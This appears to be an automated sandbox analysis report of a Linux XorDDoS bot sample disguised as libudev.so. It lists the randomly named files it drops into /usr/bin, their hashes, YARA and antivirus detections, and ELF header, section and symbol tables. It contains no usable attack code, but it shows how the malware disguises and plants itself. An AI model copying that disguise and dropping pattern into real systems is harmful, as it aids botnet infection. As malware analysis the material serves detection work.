Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/hfdnmorvjd

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	610304
Entropy (8bit):	6.209349289572672
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4Ul3:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl3
MD5:	96320734381749DA66B251CF007D8FF5
SHA1:	8DFA9E396C77317A2938AE9DBDA5BED0F747C673
SHA-256:	0774FEC8F52346211FC87FCB41318D9BD3ED00A1F00D9D13E10FE64F8313661B
SHA-512:	ECF20530AD8A53E9C5515B83FF2410F55C6BD8B4F8A82AF5BE2BE80C73C0A3920DC23E04534BB4161F5368D483F5D54F24D9B645D7312BC6E42BCED37A0F4B96
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/hfdnmorvjd, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/hfdnmorvjd, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 60%, Browse Antivirus: ReversingLabs, Detection: 80%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/jjfbelholv

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244401761764392
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AW:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/917
MD5:	49D50C6D28B847418207973B5AEB45E4
SHA1:	A7CB6237A0199E0F1FDEFF31F1565372E8D5B723
SHA-256:	16FA377A73D51D7BAD9D7757A372E9BD2D424ABD4AED6FD7A1CB7A7D9D2752B6
SHA-512:	BE179D4B78D72FB047AD3F0274057F5D3F60654AC45BD901BE566DFAAC20EC983522A027D4750E9000D95D1DFD39E3FBEF4252730BC0E3AD51ABD28F6442F67A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/jjfbelholv, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/jjfbelholv, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/jjfbelholv, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/mljnlxkfff

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244407971496464
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AQ:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91N
MD5:	D750C8BEAC9F7E938ED3D56311D9B66C
SHA1:	D60A1D890B0818FE14114985CC745EDCDAF3E848
SHA-256:	7C79961096405549E67B12EFEE4659760C4CDF09B635534DCA531503D2241323
SHA-512:	CCD7CB479C7EEE4E278128C741D9C2AD2054C8FAC2389C7FA8AD778332EF75FD01D35961EBBC5947448E2484F86B95E3B1B79459FCC4B0AD12F2552665344ACD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/mljnlxkfff, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/mljnlxkfff, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/mljnlxkfff, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/tiupbsaswr

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244403687487224
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AW:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91P
MD5:	F03F39E4AAF6A5CA7A154972E56405F7
SHA1:	F657F6FCCF1664B9506DAD10F806916D7192FBF7
SHA-256:	A08D2CA52B895B7FA9B5812F0554223654EF5E03995DCD7CB7BCA748B30E2BDC
SHA-512:	BDCF4146042D416EF020146F28D7E4A9EFA4E84798688D12EAEA6260C2846C46EFD1F44AA909A291A2DFAC26A7722DD7116FD8E2D7FC0B6B5DF56EF1D9E11FD8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/tiupbsaswr, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/tiupbsaswr, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/tiupbsaswr, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/trcmbxxcta

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244400951993568
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ac:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/915
MD5:	E93EE3F4DED35CEEAB60752300A344D0
SHA1:	0325929E1F69C50AB5B9F7F0CE1E8EA22D73AE25
SHA-256:	4C4F0DB79F9428A4CED61220F49A21C043A380CCB8E9B22AA6A82751B74D7D50
SHA-512:	4C1ED9CEC00047D315BE5C2631F64DE2BE3ED22CAEB5B4713A7C78F31EB33B023CA57C4A186F57F73A93608B43D3ACB3AECFBBC69E3FF103351ED258AF4303D6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/trcmbxxcta, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/trcmbxxcta, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/trcmbxxcta, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/uhyqxsqece

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244412944744353
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ay:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91z
MD5:	DAC7A7F61F77EB41E695AD36523C8FAA
SHA1:	5E124A29A6F138C7595C4743A7218C41EB361C44
SHA-256:	EC46314C3A253004752759ABBD850F155EB7E107AE01C55872443EC044C8DC9E
SHA-512:	EE38708B521CDED08E1B425C97A687D257E58E98B953EB66A6590C8BB35699F3E1140CBE8B5692F7A96241888B385C19F16392B895C31FF894A73DF6B5A99591
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uhyqxsqece, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uhyqxsqece, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uhyqxsqece, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/uijxdyxaco

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.2444013656132205
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Aj:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91y
MD5:	4F925977B7FA1D98EC538468E3547E28
SHA1:	8B11CBF131800A79A36862B5A60430D0C20B319D
SHA-256:	E899E4F08A544C495423BF3507DE66FB3352E13907B74F4815C3A5D42DC229B3
SHA-512:	061239BA69FE6A9D7D31406BE6FD5C973FC11E6EDB4FC50CA7BF0B91A5B7CAFA3D1F18982A67706902F2A6B896E6E2569D60C55F1541F63BFD98AF96829225F3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/uijxdyxaco, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/uijxdyxaco, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/uijxdyxaco, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/ypclxoxcxk

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625878
Entropy (8bit):	6.244399011058191
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1At:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/914
MD5:	189FA45A47A27AEDF70F0E8468D9FACB
SHA1:	6558C2E8409337B90F32C6ECCBC07AF10C04D171
SHA-256:	55E4237B26194ECDB8EFF07D47323CC572CA679F83DE9A410A7F7EAB4E389701
SHA-512:	5D93F720259191FAAD875D1F8405328E6662F88BA2A1BA6BEE4BC7872AFD27AEE916BDA638B7B0AA3CE016469A6ADCBD8AD1A873C91198E7CD3268FCC4F1482D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ypclxoxcxk, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/ypclxoxcxk, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/ypclxoxcxk, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/lib/libudev.so

Process:	/tmp/libudev.so
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625867
Entropy (8bit):	6.244370981024914
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91h
MD5:	7DC92A289A05C45D4179A322344AD09C
SHA1:	BE912477F64A1EE9F2D8DDAEBCE6EFDFD00E7CCD
SHA-256:	8642022960D919321CCFCFB0A0CD631DB0E5DAC3E75014FC0C4CC6FF413C72C5
SHA-512:	717F42D45FB07173BFC47B1FCA26E85222EE676F2164A0F84D584EDA963F67BBDE8C68695E708B07EF6D5E2101510EE077EAE1653AE66A7C7C90397E869F29BF
Malicious:	true
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Entropy (8bit):	6.244370981024914
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	libudev.so
File size:	625867
MD5:	7dc92a289a05c45d4179a322344ad09c
SHA1:	be912477f64a1ee9f2d8ddaebce6efdfd00e7ccd
SHA256:	8642022960d919321ccfcfb0a0cd631db0e5dac3e75014fc0c4cc6ff413c72c5
SHA512:	717f42d45fb07173bfc47b1fca26e85222ee676f2164a0f84d584eda963f67bbde8c68695e708b07ef6d5e2101510ee077eae1653ae66a7c7c90397e869f29bf
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1AG:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91h
TLSH:	DDD47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
File Content Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	553480
Section Header Size:	40
Number of Section Headers:	28
Header String Table Index:	25

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	0	0	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x8048110	0x110	0x697d8	0x0	0x6	AX	0	0	16
__libc_freeres_fn	PROGBITS	0x80b18f0	0x698f0	0x100f	0x0	0x6	AX	0	0	16
__libc_thread_freeres_fn	PROGBITS	0x80b2900	0x6a900	0x1db	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x80b2adc	0x6aadc	0x1c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x80b2b00	0x6ab00	0x153c0	0x0	0x2	A	0	0	32
__libc_subfreeres	PROGBITS	0x80c7ec0	0x7fec0	0x30	0x0	0x2	A	0	0	4
__libc_atexit	PROGBITS	0x80c7ef0	0x7fef0	0x4	0x0	0x2	A	0	0	4
__libc_thread_subfreeres	PROGBITS	0x80c7ef4	0x7fef4	0x8	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x80c7efc	0x7fefc	0x60f4	0x0	0x2	A	0	0	4
.gcc_except_table	PROGBITS	0x80cdff0	0x85ff0	0x11b	0x0	0x2	A	0	0	1
.tdata	PROGBITS	0x80cf10c	0x8610c	0x14	0x0	0x403	WAT	0	0	4
.tbss	NOBITS	0x80cf120	0x86120	0x2c	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x80cf120	0x86120	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x80cf128	0x86128	0xc	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x80cf134	0x86134	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x80cf138	0x86138	0x2c	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x80cf164	0x86164	0x8	0x4	0x3	WA	0	0	4
.got.plt	PROGBITS	0x80cf16c	0x8616c	0xc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x80cf180	0x86180	0xb40	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x80cfcc0	0x86cc0	0x6718	0x0	0x3	WA	0	0	32
__libc_freeres_ptrs	NOBITS	0x80d63d8	0x86cc0	0x14	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x86cc0	0x422	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x870e2	0x126	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x87668	0x93c0	0x10	0x0		27	914	4
.strtab	STRTAB	0x0	0x90a28	0x82a3	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x8610b	0x8610b	6.1966	0x5	R E	0x1000		.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x8610c	0x80cf10c	0x80cf10c	0xbb4	0x72e0	3.6572	0x6	RW	0x1000		.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4		.note.ABI-tag
TLS	0x8610c	0x80cf10c	0x80cf10c	0x14	0x40	2.8414	0x4	R	0x4		.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Version Info Name	Version Info File Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
			.symtab	0x80480d4	0	SECTION	<unknown>	DEFAULT	1
			.symtab	0x80480f4	0	SECTION	<unknown>	DEFAULT	2
			.symtab	0x8048110	0	SECTION	<unknown>	DEFAULT	3
			.symtab	0x80b18f0	0	SECTION	<unknown>	DEFAULT	4
			.symtab	0x80b2900	0	SECTION	<unknown>	DEFAULT	5
			.symtab	0x80b2adc	0	SECTION	<unknown>	DEFAULT	6
			.symtab	0x80b2b00	0	SECTION	<unknown>	DEFAULT	7
			.symtab	0x80c7ec0	0	SECTION	<unknown>	DEFAULT	8
			.symtab	0x80c7ef0	0	SECTION	<unknown>	DEFAULT	9
			.symtab	0x80c7ef4	0	SECTION	<unknown>	DEFAULT	10
			.symtab	0x80c7efc	0	SECTION	<unknown>	DEFAULT	11
			.symtab	0x80cdff0	0	SECTION	<unknown>	DEFAULT	12
			.symtab	0x80cf10c	0	SECTION	<unknown>	DEFAULT	13
			.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	14
			.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	15
			.symtab	0x80cf128	0	SECTION	<unknown>	DEFAULT	16
			.symtab	0x80cf134	0	SECTION	<unknown>	DEFAULT	17
			.symtab	0x80cf138	0	SECTION	<unknown>	DEFAULT	18
			.symtab	0x80cf164	0	SECTION	<unknown>	DEFAULT	19
			.symtab	0x80cf16c	0	SECTION	<unknown>	DEFAULT	20
			.symtab	0x80cf180	0	SECTION	<unknown>	DEFAULT	21
			.symtab	0x80cfcc0	0	SECTION	<unknown>	DEFAULT	22
			.symtab	0x80d63d8	0	SECTION	<unknown>	DEFAULT	23
			.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
.L108			.symtab	0x80ad950	0	NOTYPE	<unknown>	DEFAULT	3
.L113			.symtab	0x80ad990	0	NOTYPE	<unknown>	DEFAULT	3
.L114			.symtab	0x80ad9f8	0	NOTYPE	<unknown>	DEFAULT	3
.L115			.symtab	0x80ada30	0	NOTYPE	<unknown>	DEFAULT	3
.L116			.symtab	0x80ada4e	0	NOTYPE	<unknown>	DEFAULT	3
.L117			.symtab	0x80ada6c	0	NOTYPE	<unknown>	DEFAULT	3
.L118			.symtab	0x80ada89	0	NOTYPE	<unknown>	DEFAULT	3
.L119			.symtab	0x80adabd	0	NOTYPE	<unknown>	DEFAULT	3
.L12			.symtab	0x80b130b	0	NOTYPE	<unknown>	DEFAULT	3
.L120			.symtab	0x80adadc	0	NOTYPE	<unknown>	DEFAULT	3
.L121			.symtab	0x80adafb	0	NOTYPE	<unknown>	DEFAULT	3
.L122			.symtab	0x80ad8e3	0	NOTYPE	<unknown>	DEFAULT	3
.L123			.symtab	0x80adb2b	0	NOTYPE	<unknown>	DEFAULT	3
.L124			.symtab	0x80add7f	0	NOTYPE	<unknown>	DEFAULT	3
.L125			.symtab	0x80addb4	0	NOTYPE	<unknown>	DEFAULT	3
.L126			.symtab	0x80add02	0	NOTYPE	<unknown>	DEFAULT	3
.L127			.symtab	0x80add1f	0	NOTYPE	<unknown>	DEFAULT	3
.L128			.symtab	0x80add46	0	NOTYPE	<unknown>	DEFAULT	3
.L129			.symtab	0x80add63	0	NOTYPE	<unknown>	DEFAULT	3
.L130			.symtab	0x80adb8c	0	NOTYPE	<unknown>	DEFAULT	3
.L131			.symtab	0x80adbd3	0	NOTYPE	<unknown>	DEFAULT	3
.L132			.symtab	0x80adc00	0	NOTYPE	<unknown>	DEFAULT	3
.L133			.symtab	0x80adc37	0	NOTYPE	<unknown>	DEFAULT	3
.L134			.symtab	0x80adc50	0	NOTYPE	<unknown>	DEFAULT	3
.L135			.symtab	0x80adc7d	0	NOTYPE	<unknown>	DEFAULT	3
.L136			.symtab	0x80adcb5	0	NOTYPE	<unknown>	DEFAULT	3
.L137			.symtab	0x80adcc9	0	NOTYPE	<unknown>	DEFAULT	3
.L14			.symtab	0x80b1419	0	NOTYPE	<unknown>	DEFAULT	3
.L15			.symtab	0x80b1408	0	NOTYPE	<unknown>	DEFAULT	3
.L16			.symtab	0x80b13f8	0	NOTYPE	<unknown>	DEFAULT	3
.L17			.symtab	0x80b13e8	0	NOTYPE	<unknown>	DEFAULT	3
.L18			.symtab	0x80b138c	0	NOTYPE	<unknown>	DEFAULT	3
.L19			.symtab	0x80b137e	0	NOTYPE	<unknown>	DEFAULT	3
.L20			.symtab	0x80b1345	0	NOTYPE	<unknown>	DEFAULT	3
.L21			.symtab	0x80b1371	0	NOTYPE	<unknown>	DEFAULT	3
